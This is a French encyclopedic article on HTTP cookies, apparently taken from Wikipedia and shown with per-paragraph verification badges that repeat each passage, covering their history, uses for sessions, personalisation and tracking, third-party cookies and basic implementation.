Cookie (informatique)
Plus d’actions
L’essentiel
Pour commencer
Un cookie (prononcé ˈkʊk.i], litt. « biscuit » en anglais), également appelé témoin de connexion ou témoin de navigation, est une petite quantité de données envoyée par un serveur HTTP à l'utilisateur d'un site web puis stockée par son navigateur sur son… Non vérifiéNon vérifié Ce passage ne dispose pas encore de vérification factuelle exploitable.×

Explorer ce sujet
Cette activité est en cours de vérification. Le texte complet et les sources restent accessibles ci-dessous.
Carte du sujet
Relier les principales parties de l’article.
Le sommaire textuel reste disponible.
- Explorer autrement
- Présentation
- Historique Non vérifiéNon vérifié Ce passage ne dispose pas encore de vérification factuelle exploitable.×
Poursuivre l’exploration
Explorez à votre rythme
Explorer autrement
Modules interactifs liés aux sources et accompagnés d’une alternative textuelle.
Présentation
Un cookie (prononcé ˈkʊk.i], litt. « biscuit » en anglais), également appelé témoin de connexion ou témoin de navigation, est une petite quantité de données envoyée par un serveur HTTP à l'utilisateur d'un site web puis stockée par son navigateur sur son… SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Un cookie (prononcé ˈkʊk.i], litt. « biscuit » en anglais), également appelé témoin de connexion ou témoin de navigation, est une petite quantité de données envoyée par un serveur HTTP à l'utilisateur d'un site web puis stockée par son navigateur sur son…
×
Historique
Le terme cookie dérive du terme anglais , désignant un paquet de données qu'un programme reçoit et renvoie inchangé. En français, les cookies sont aussi appelés « témoin de connexion »,, « témoin de navigation » ou « témoin »,. Non vérifiéNon vérifié Ce passage ne dispose pas encore de vérification factuelle exploitable.×
Lire « Historique » dans le texte →Gestion des sessions
Les cookies peuvent être utilisés pour maintenir les données relatives à l'utilisateur durant sa navigation, mais aussi à travers plusieurs visites. Les cookies ont été introduits pour donner un moyen d'implémenter les paniers d'achats électroniques, des… SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies peuvent être utilisés pour maintenir les données relatives à l'utilisateur durant sa navigation, mais aussi à travers plusieurs visites. Les cookies ont été introduits pour donner un moyen d'implémenter les paniers d'achats électroniques, des…
×
Personnalisation
Les cookies peuvent être utilisés pour mémoriser l'information sur l'utilisateur d'un site, dans le but de lui montrer un contenu approprié à l'avenir. Par exemple, un serveur web peut envoyer un cookie contenant le dernier nom d'utilisateur utilisé pour se… SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies peuvent être utilisés pour mémoriser l'information sur l'utilisateur d'un site, dans le but de lui montrer un contenu approprié à l'avenir. Par exemple, un serveur web peut envoyer un cookie contenant le dernier nom d'utilisateur utilisé pour se…
×
Aller au fond du sujet
Le texte et ses détails
Présentation
Un cookie (prononcé ˈkʊk.i][1], litt. « biscuit » en anglais), également appelé témoin de connexion ou témoin de navigation, est une petite quantité de données envoyée par un serveur HTTP à l'utilisateur d'un site web puis stockée par son navigateur sur son appareil. Il permet de créer une session de navigation avec état (préférences d'affichage, contenu d'un panier d'achat...) lors de sa visite. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Un cookie (prononcé ˈkʊk.i], litt. « biscuit » en anglais), également appelé témoin de connexion ou témoin de navigation, est une petite quantité de données envoyée par un serveur HTTP à l'utilisateur d'un site web puis stockée par son navigateur sur son appareil. Il permet de créer une session de navigation avec état (préférences d'affichage, contenu d'un panier d'achat...) lors de sa visite.
×
Cette technologie est actuellement utilisée par la moitié des sites web[2]. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Cette technologie est actuellement utilisée par la moitié des sites web.
×
Inventé en 1994 par des ingénieurs de la société Netscape, le cookie est un fichier texte constitué de paires clé-valeur échangées par le protocole de communication HTTP. Créé par un serveur HTTP, le cookie est envoyé au client HTTP pour être enregistré un temps spécifié durant lequel il est renvoyé tel quel au serveur à chaque requête web. La durée d'enregistrement peut s'étendre de quelques minutes à plusieurs années. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Inventé en 1994 par des ingénieurs de la société Netscape, le cookie est un fichier texte constitué de paires clé-valeur échangées par le protocole de communication HTTP. Créé par un serveur HTTP, le cookie est envoyé au client HTTP pour être enregistré un temps spécifié durant lequel il est renvoyé tel quel au serveur à chaque requête web. La durée d'enregistrement peut s'étendre de quelques minutes à plusieurs années.
×
Le cookie permet ainsi aux sites web d'identifier les internautes lorsqu'ils passent d'une page web à l'autre du site, voire lorsqu'ils reviennent des années plus tard. Les cookies sont notamment utilisés pour identifier la session d'un internaute connecté à son compte informatique. La confidentialité des cookies est donc importante pour la sécurité Internet. Plus généralement, les cookies servent à lier à une visite toute information d'état. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Le cookie permet ainsi aux sites web d'identifier les internautes lorsqu'ils passent d'une page web à l'autre du site, voire lorsqu'ils reviennent des années plus tard. Les cookies sont notamment utilisés pour identifier la session d'un internaute connecté à son compte informatique. La confidentialité des cookies est donc importante pour la sécurité Internet. Plus généralement, les cookies servent à lier à une visite toute information d'état.
×
L'utilisation de cookies par des entreprises de pistage web suscite des controverses. En effet, ces cookies tiers liés par exemple à des bannières de publicité en ligne permettent de suivre les internautes visitant des sites web sans rapport, si ce n'est l'entreprise sous-traitante de pistage. Les usages qui ne répondent pas à des contraintes strictement techniques ont été régulés par des lois comme la directive du 12 juillet 2002 sur la protection de la vie privée dans le secteur des communications électroniques de l'Union européenne. Les sites web obéissant à cette directive permettent aux visiteurs d'accepter sélectivement les cookies[3]. Les navigateurs web permettent également aux utilisateurs de gérer les cookies. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06L'utilisation de cookies par des entreprises de pistage web suscite des controverses. En effet, ces cookies tiers liés par exemple à des bannières de publicité en ligne permettent de suivre les internautes visitant des sites web sans rapport, si ce n'est l'entreprise sous-traitante de pistage. Les usages qui ne répondent pas à des contraintes strictement techniques ont été régulés par des lois comme la directive du 12 juillet 2002 sur la protection de la vie privée dans le secteur des communications électroniques de l'Union européenne. Les sites web obéissant à cette directive permettent aux visiteurs d'accepter sélectivement les cookies. Les navigateurs web permettent également aux utilisateurs de gérer les cookies.
×
Historique
Le terme cookie dérive du terme anglais magic cookie[4], désignant un paquet de données qu'un programme reçoit et renvoie inchangé. En français, les cookies sont aussi appelés « témoin de connexion »[5],[6], « témoin de navigation »[7] ou « témoin »[5],[6]. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Le terme cookie dérive du terme anglais magic cookie, désignant un paquet de données qu'un programme reçoit et renvoie inchangé. En français, les cookies sont aussi appelés « témoin de connexion »,, « témoin de navigation » ou « témoin »,.
×
Les cookies étaient déjà utilisés en informatique quand Lou Montulli[8] a eu l'idée de les utiliser dans les communications web en juin 1994. En ce temps, il était employé de Netscape Communications. John Giannandrea et Lou Montulli ont écrit la même année la première spécification des cookies de Netscape Navigator. La version 0.9 bêta de Mosaic Netscape, publiée le 13 octobre 1994, intégrait la technologie des cookies[9],[10]. La première utilisation des cookies (hors expérimentation) a été faite pour déterminer si les visiteurs du site web Netscape avaient déjà visité le site auparavant. Montulli a déposé une demande de brevet pour la technologie des cookies en 1995, et le brevet US 5774670 a été accordé en 1998[11]. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies étaient déjà utilisés en informatique quand Lou Montulli a eu l'idée de les utiliser dans les communications web en juin 1994. En ce temps, il était employé de Netscape Communications. John Giannandrea et Lou Montulli ont écrit la même année la première spécification des cookies de Netscape Navigator. La version 0.9 bêta de Mosaic Netscape, publiée le 13 octobre 1994, intégrait la technologie des cookies,. La première utilisation des cookies (hors expérimentation) a été faite pour déterminer si les visiteurs du site web Netscape avaient déjà visité le site auparavant. Montulli a déposé une demande de brevet pour la technologie des cookies en 1995, et le brevet US 5774670 a été accordé en 1998.
×
Après avoir été implantés dans Netscape 0.9 beta en 1994, les cookies ont été intégrés dans Internet Explorer 2, publié en octobre 1995. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Après avoir été implantés dans Netscape 0.9 beta en 1994, les cookies ont été intégrés dans Internet Explorer 2, publié en octobre 1995.
×
L'introduction des cookies n'a pas été largement connue du grand public pour autant. En particulier, les cookies étaient acceptés par défaut dans les paramètres des navigateurs, et les utilisateurs n'étaient pas informés de leur présence. Certaines personnes étaient au courant de l'existence des cookies au début de l'année 1995, mais le grand public n'apprit leur existence qu'après la publication par le Financial Times d'un article le 12 février 1996. La même année, les cookies reçurent beaucoup d'attention de la part des médias, à cause de possibles intrusions dans la vie privée. Le sujet des cookies fut discuté dans deux consultations de la Federal Trade Commission des États-Unis en 1996 et 1997. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06L'introduction des cookies n'a pas été largement connue du grand public pour autant. En particulier, les cookies étaient acceptés par défaut dans les paramètres des navigateurs, et les utilisateurs n'étaient pas informés de leur présence. Certaines personnes étaient au courant de l'existence des cookies au début de l'année 1995, mais le grand public n'apprit leur existence qu'après la publication par le Financial Times d'un article le 12 février 1996. La même année, les cookies reçurent beaucoup d'attention de la part des médias, à cause de possibles intrusions dans la vie privée. Le sujet des cookies fut discuté dans deux consultations de la Federal Trade Commission des États-Unis en 1996 et 1997.
×
Le développement de la spécification officielle des cookies était déjà en cours. Les premières discussions sur la spécification officielle eurent lieu en avril 1995 sur la liste de discussion www-talk. Un groupe spécial de travail du IETF fut formé. Deux propositions alternatives pour introduire un état dans les transactions HTTP ont été proposées par Brian Behlendorf et David Kristol respectivement. Cependant, le groupe, dirigé par Kristol lui-même, a décidé d'utiliser la spécification de Netscape comme point de départ. En février 1996, le groupe de travail a déterminé que les cookies tiers (third party cookies) étaient une menace considérable à la protection de la vie privée. La spécification produite par le groupe a finalement été publiée en tant que RFC 2109[12]. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Le développement de la spécification officielle des cookies était déjà en cours. Les premières discussions sur la spécification officielle eurent lieu en avril 1995 sur la liste de discussion www-talk. Un groupe spécial de travail du IETF fut formé. Deux propositions alternatives pour introduire un état dans les transactions HTTP ont été proposées par Brian Behlendorf et David Kristol respectivement. Cependant, le groupe, dirigé par Kristol lui-même, a décidé d'utiliser la spécification de Netscape comme point de départ. En février 1996, le groupe de travail a déterminé que les cookies tiers (third party cookies) étaient une menace considérable à la protection de la vie privée. La spécification produite par le groupe a finalement été publiée en tant que RFC 2109.
×
À partir de fin 2014, on voit un bandeau au sujet des cookies sur de nombreux sites. Il existe plusieurs extensions de navigateur permettant le non-affichage du bandeau[13]. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06À partir de fin 2014, on voit un bandeau au sujet des cookies sur de nombreux sites. Il existe plusieurs extensions de navigateur permettant le non-affichage du bandeau.
×
Utilisations
Gestion des sessions
Les cookies peuvent être utilisés pour maintenir les données relatives à l'utilisateur durant sa navigation, mais aussi à travers plusieurs visites. Les cookies ont été introduits pour donner un moyen d'implémenter les paniers d'achats électroniques, des dispositifs permettant à l'utilisateur d'accumuler les articles qu'il veut acheter durant sa navigation sur le site. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies peuvent être utilisés pour maintenir les données relatives à l'utilisateur durant sa navigation, mais aussi à travers plusieurs visites. Les cookies ont été introduits pour donner un moyen d'implémenter les paniers d'achats électroniques, des dispositifs permettant à l'utilisateur d'accumuler les articles qu'il veut acheter durant sa navigation sur le site.
×
De nos jours, les applications comme les paniers d'achat enregistrent plutôt la liste des articles dans une base de données sur un serveur, ce qui est préférable, plutôt que de les enregistrer dans le cookie lui-même. Le serveur web envoie un cookie contenant un identifiant de session unique. Le navigateur web renvoie alors cet identifiant de session à chaque requête suivante et les articles du panier sont enregistrés et associés avec ce même identifiant unique de session. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06De nos jours, les applications comme les paniers d'achat enregistrent plutôt la liste des articles dans une base de données sur un serveur, ce qui est préférable, plutôt que de les enregistrer dans le cookie lui-même. Le serveur web envoie un cookie contenant un identifiant de session unique. Le navigateur web renvoie alors cet identifiant de session à chaque requête suivante et les articles du panier sont enregistrés et associés avec ce même identifiant unique de session.
×
Les cookies sont utiles dans le cadre de la connexion à un site à l'aide d'identifiants : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies sont utiles dans le cadre de la connexion à un site à l'aide d'identifiants :
×
- L'application web envoie un cookie contenant un identifiant unique de session lors de la première connexion ; SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
L'application web envoie un cookie contenant un identifiant unique de session lors de la première connexion ;
× - L'utilisateur fournit ses identifiants (généralement un nom d'utilisateur et un mot de passe) lorsqu'il s'authentifie ; SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
L'utilisateur fournit ses identifiants (généralement un nom d'utilisateur et un mot de passe) lorsqu'il s'authentifie ;
× - L'application web valide l'authentification et permet à l'utilisateur d'accéder au service ; le cookie permet alors de conserver la mémoire du fait que la connexion a été validée, et évite ainsi de redemander ses informations de connexion à l'utilisateur à chaque nouvel accès. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
L'application web valide l'authentification et permet à l'utilisateur d'accéder au service ; le cookie permet alors de conserver la mémoire du fait que la connexion a été validée, et évite ainsi de redemander ses informations de connexion à l'utilisateur à chaque nouvel accès.
×
Selon certaines implémentations, le cookie de session n’est généré qu’après la validation des identifiants de l’utilisateur, afin de garantir que seule une authentification réussie engendre la création d’une session. Cette approche est notamment recommandée par Firebase Authentication[14], qui préconise la création du cookie de session côté serveur à partir d’un jeton d’identification validé (cette configuration implique que l’ordre des étapes décrites précédemment peut être inversé, le cookie de session n’étant alors transmis qu’après l’authentification, et non avant celle-ci[14]). SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Selon certaines implémentations, le cookie de session n’est généré qu’après la validation des identifiants de l’utilisateur, afin de garantir que seule une authentification réussie engendre la création d’une session. Cette approche est notamment recommandée par Firebase Authentication, qui préconise la création du cookie de session côté serveur à partir d’un jeton d’identification validé (cette configuration implique que l’ordre des étapes décrites précédemment peut être inversé, le cookie de session n’étant alors transmis qu’après l’authentification, et non avant celle-ci).
×
Personnalisation
Les cookies peuvent être utilisés pour mémoriser l'information sur l'utilisateur d'un site, dans le but de lui montrer un contenu approprié à l'avenir. Par exemple, un serveur web peut envoyer un cookie contenant le dernier nom d'utilisateur utilisé pour se connecter à ce site web, afin que ce nom d'utilisateur puisse être prérempli lors des prochaines visites. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies peuvent être utilisés pour mémoriser l'information sur l'utilisateur d'un site, dans le but de lui montrer un contenu approprié à l'avenir. Par exemple, un serveur web peut envoyer un cookie contenant le dernier nom d'utilisateur utilisé pour se connecter à ce site web, afin que ce nom d'utilisateur puisse être prérempli lors des prochaines visites.
×
Beaucoup de sites web utilisent les cookies pour la personnalisation basée sur les préférences des utilisateurs. Les utilisateurs sélectionnent leurs préférences dans un formulaire et envoient celles-ci au serveur. Le serveur encode les préférences dans un cookie et renvoie celui-ci au navigateur. Par la suite, à chaque fois que l'utilisateur accède à une page de ce site, le navigateur renvoie le cookie et donc la liste des préférences ; le serveur peut alors personnaliser la page d'après les préférences de l'utilisateur. Par exemple, le site web de Wikipédia permet à ses utilisateurs de choisir l'habillage du site qu'ils préfèrent. Le moteur de recherche Google permet à ses utilisateurs (même s'ils ne sont pas enregistrés) de choisir le nombre de résultats qu'ils veulent voir sur chaque page de résultats. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Beaucoup de sites web utilisent les cookies pour la personnalisation basée sur les préférences des utilisateurs. Les utilisateurs sélectionnent leurs préférences dans un formulaire et envoient celles-ci au serveur. Le serveur encode les préférences dans un cookie et renvoie celui-ci au navigateur. Par la suite, à chaque fois que l'utilisateur accède à une page de ce site, le navigateur renvoie le cookie et donc la liste des préférences ; le serveur peut alors personnaliser la page d'après les préférences de l'utilisateur. Par exemple, le site web de Wikipédia permet à ses utilisateurs de choisir l'habillage du site qu'ils préfèrent. Le moteur de recherche Google permet à ses utilisateurs (même s'ils ne sont pas enregistrés) de choisir le nombre de résultats qu'ils veulent voir sur chaque page de résultats.
×
Pistage
Les cookies de pistage (ou traceurs) sont utilisés pour suivre les habitudes de navigation des utilisateurs d'internet. Cela peut être fait aussi en partie en utilisant l'adresse IP de l'ordinateur faisant une requête d'une page ou à l'aide de l'en-tête HTTP « référant » que le client envoie à chaque requête, mais les cookies permettent une plus grande précision. Cela peut être fait comme dans l'exemple suivant : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies de pistage (ou traceurs) sont utilisés pour suivre les habitudes de navigation des utilisateurs d'internet. Cela peut être fait aussi en partie en utilisant l'adresse IP de l'ordinateur faisant une requête d'une page ou à l'aide de l'en-tête HTTP « référant » que le client envoie à chaque requête, mais les cookies permettent une plus grande précision. Cela peut être fait comme dans l'exemple suivant :
×
- Si l'utilisateur fait appel à une page d'un site, et que la requête ne contient pas de cookie, le serveur présume que c'est la première page visitée par l'utilisateur. Le serveur crée alors une chaîne aléatoire et l'envoie au navigateur en même temps que la page demandée ; SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Si l'utilisateur fait appel à une page d'un site, et que la requête ne contient pas de cookie, le serveur présume que c'est la première page visitée par l'utilisateur. Le serveur crée alors une chaîne aléatoire et l'envoie au navigateur en même temps que la page demandée ;
× - À partir de ce moment, le cookie sera automatiquement envoyé par le navigateur dès qu'une nouvelle page du site sera appelée. Le serveur enverra la page comme d'habitude, mais enregistrera aussi l'URL de la page appelée, la date, l'heure de la requête et le cookie dans un fichier de journalisation. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
À partir de ce moment, le cookie sera automatiquement envoyé par le navigateur dès qu'une nouvelle page du site sera appelée. Le serveur enverra la page comme d'habitude, mais enregistrera aussi l'URL de la page appelée, la date, l'heure de la requête et le cookie dans un fichier de journalisation.
×
En regardant le fichier de journalisation, il est alors possible de voir quelles pages l'utilisateur a visitées et dans quel ordre. Par exemple, si le fichier contient quelques requêtes faites en utilisant le cookie id=abc, cela peut établir que toutes ces requêtes proviennent du même utilisateur. L'URL demandée, la date et l'heure associées aux requêtes permettent de suivre la navigation de l'utilisateur à la trace. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06En regardant le fichier de journalisation, il est alors possible de voir quelles pages l'utilisateur a visitées et dans quel ordre. Par exemple, si le fichier contient quelques requêtes faites en utilisant le cookie id=abc, cela peut établir que toutes ces requêtes proviennent du même utilisateur. L'URL demandée, la date et l'heure associées aux requêtes permettent de suivre la navigation de l'utilisateur à la trace.
×
Les cookies tiers et les pixels espions, expliqués ci-dessous, permettent en plus le pistage à travers différents sites. Le pistage dans un seul site est généralement utilisé pour un usage statistique. Par contre, le pistage dans différents sites à l'aide des cookies tierces parties est généralement utilisé par les entreprises de publicité pour produire des profils d'utilisateurs anonymes (qui sont alors utilisés pour déterminer quelles publicités devraient être montrées à l'utilisateur et, si l’adresse e-mail de l’utilisateur est connue, pour lui envoyer des mails correspondant à ces publicités). SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies tiers et les pixels espions, expliqués ci-dessous, permettent en plus le pistage à travers différents sites. Le pistage dans un seul site est généralement utilisé pour un usage statistique. Par contre, le pistage dans différents sites à l'aide des cookies tierces parties est généralement utilisé par les entreprises de publicité pour produire des profils d'utilisateurs anonymes (qui sont alors utilisés pour déterminer quelles publicités devraient être montrées à l'utilisateur et, si l’adresse e-mail de l’utilisateur est connue, pour lui envoyer des mails correspondant à ces publicités).
×
Les cookies de pistage sont un risque d'atteinte à la vie privée de l'utilisateur mais ils peuvent être supprimés facilement. La plupart des navigateurs récents incluent une option pour supprimer automatiquement les cookies persistant à la fermeture de l'application. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies de pistage sont un risque d'atteinte à la vie privée de l'utilisateur mais ils peuvent être supprimés facilement. La plupart des navigateurs récents incluent une option pour supprimer automatiquement les cookies persistant à la fermeture de l'application.
×
Cookies tiers (cookies de tierce partie)
Les images et autres objets contenus dans une page web peuvent résider dans des serveurs différents de celui hébergeant la page. Pour afficher la page, le navigateur télécharge tous ces objets. La plupart des sites web contiennent des informations provenant de différentes sources. Par exemple, si l’utilisateur saisit www.exemple.com dans son navigateur, il y aura souvent des objets ou des publicités sur une partie de la page qui proviendront de sources différentes, c'est-à-dire d'un domaine différent de www.exemple.com. Les cookies « première partie » sont des cookies qui sont mis en place par le domaine inscrit dans la barre d'adresse du navigateur. Les cookies tiers sont mis en place par l'un des objets de la page qui proviennent d'un domaine différent. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les images et autres objets contenus dans une page web peuvent résider dans des serveurs différents de celui hébergeant la page. Pour afficher la page, le navigateur télécharge tous ces objets. La plupart des sites web contiennent des informations provenant de différentes sources. Par exemple, si l’utilisateur saisit www.exemple.com dans son navigateur, il y aura souvent des objets ou des publicités sur une partie de la page qui proviendront de sources différentes, c'est-à-dire d'un domaine différent de www.exemple.com. Les cookies « première partie » sont des cookies qui sont mis en place par le domaine inscrit dans la barre d'adresse du navigateur. Les cookies tiers sont mis en place par l'un des objets de la page qui proviennent d'un domaine différent.
×
Par défaut, les navigateurs comme Internet Explorer et Opera acceptent les cookies de tierce partie, mais les utilisateurs peuvent changer les paramètres du navigateur pour les bloquer. Au contraire, les navigateurs Mozilla Firefox ou Safari bloquent par défaut de nombreux cookies tiers[15],[16]. Il n'y a pas de risque de sécurité inhérent aux cookies tiers qui permettent des fonctionnalités pour le web. Cependant, ils servent aussi à pister les internautes de site en site[17]. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Par défaut, les navigateurs comme Internet Explorer et Opera acceptent les cookies de tierce partie, mais les utilisateurs peuvent changer les paramètres du navigateur pour les bloquer. Au contraire, les navigateurs Mozilla Firefox ou Safari bloquent par défaut de nombreux cookies tiers,. Il n'y a pas de risque de sécurité inhérent aux cookies tiers qui permettent des fonctionnalités pour le web. Cependant, ils servent aussi à pister les internautes de site en site.
×
Des acteurs majeurs comme Google ont annoncé mettre fin en 2022 aux cookies tiers, ce qui devait avoir des implications majeures pour le marketing[18]. Cependant, après plusieurs reports (2023, puis 2024), Google a annoncé qu'il renonçait finalement à supprimer totalement ces cookies dans Chrome[19]. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Des acteurs majeurs comme Google ont annoncé mettre fin en 2022 aux cookies tiers, ce qui devait avoir des implications majeures pour le marketing. Cependant, après plusieurs reports (2023, puis 2024), Google a annoncé qu'il renonçait finalement à supprimer totalement ces cookies dans Chrome.
×
Des outils tels que Ghostery, disponibles pour tous les navigateurs, permettent de bloquer les échanges entre tierces parties. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Des outils tels que Ghostery, disponibles pour tous les navigateurs, permettent de bloquer les échanges entre tierces parties.
×
Implémentation
Les cookies sont de petites données envoyées par le serveur web au navigateur. Le navigateur les retourne inchangées au serveur, introduisant un état (mémoire des événements antérieurs) dans la transaction HTTP qui autrement serait sans état. Sans les cookies, chaque récupération de page web ou d'un composant d'une page web est un événement isolé, indépendant des autres requêtes faites sur le même site. En plus de pouvoir être mis en place par le serveur web, les cookies peuvent aussi être mis en place par des langages de script comme JavaScript, s'il est supporté et autorisé par le navigateur. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies sont de petites données envoyées par le serveur web au navigateur. Le navigateur les retourne inchangées au serveur, introduisant un état (mémoire des événements antérieurs) dans la transaction HTTP qui autrement serait sans état. Sans les cookies, chaque récupération de page web ou d'un composant d'une page web est un événement isolé, indépendant des autres requêtes faites sur le même site. En plus de pouvoir être mis en place par le serveur web, les cookies peuvent aussi être mis en place par des langages de script comme JavaScript, s'il est supporté et autorisé par le navigateur.
×
La spécification officielle des cookies suggère que les navigateurs soient capables d'enregistrer et de renvoyer un nombre minimal de cookies. Spécifiquement, un navigateur devrait être capable de stocker au moins 300 cookies de quatre kilooctets chacun, et au moins 20 cookies pour un même serveur ou domaine. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06La spécification officielle des cookies suggère que les navigateurs soient capables d'enregistrer et de renvoyer un nombre minimal de cookies. Spécifiquement, un navigateur devrait être capable de stocker au moins 300 cookies de quatre kilooctets chacun, et au moins 20 cookies pour un même serveur ou domaine.
×
D'après la section 3.1 de la RFC 2965[20], les noms de cookies sont insensibles à la casse. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06D'après la section 3.1 de la RFC 2965, les noms de cookies sont insensibles à la casse.
×
Un cookie peut spécifier la date de son expiration, dans ce cas, le cookie sera supprimé à cette date. Si le cookie ne spécifie pas de date d'expiration, le cookie est supprimé dès que l'utilisateur quitte son navigateur. En conséquence, spécifier une date d'expiration est un moyen de faire survivre le cookie à travers plusieurs sessions. Pour cette raison, les cookies avec une date d'expiration sont dits persistants. Un exemple d'application : un site de vente peut utiliser les cookies persistants pour enregistrer les articles que les utilisateurs ont placés dans leur panier d'achat (en réalité, le cookie peut faire référence à une entrée enregistrée dans une base de données du site de vente, et non pas dans votre ordinateur). Grâce à ce moyen, si les utilisateurs quittent leur navigateur sans faire un achat et y retournent plus tard, ils pourront trouver à nouveau les articles dans le panier. Si ces cookies ne donnaient pas de date d'expiration, ils expireraient à la fermeture du navigateur, et l'information sur le contenu du panier serait perdue. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Un cookie peut spécifier la date de son expiration, dans ce cas, le cookie sera supprimé à cette date. Si le cookie ne spécifie pas de date d'expiration, le cookie est supprimé dès que l'utilisateur quitte son navigateur. En conséquence, spécifier une date d'expiration est un moyen de faire survivre le cookie à travers plusieurs sessions. Pour cette raison, les cookies avec une date d'expiration sont dits persistants. Un exemple d'application : un site de vente peut utiliser les cookies persistants pour enregistrer les articles que les utilisateurs ont placés dans leur panier d'achat (en réalité, le cookie peut faire référence à une entrée enregistrée dans une base de données du site de vente, et non pas dans votre ordinateur). Grâce à ce moyen, si les utilisateurs quittent leur navigateur sans faire un achat et y retournent plus tard, ils pourront trouver à nouveau les articles dans le panier. Si ces cookies ne donnaient pas de date d'expiration, ils expireraient à la fermeture du navigateur, et l'information sur le contenu du panier serait perdue.
×
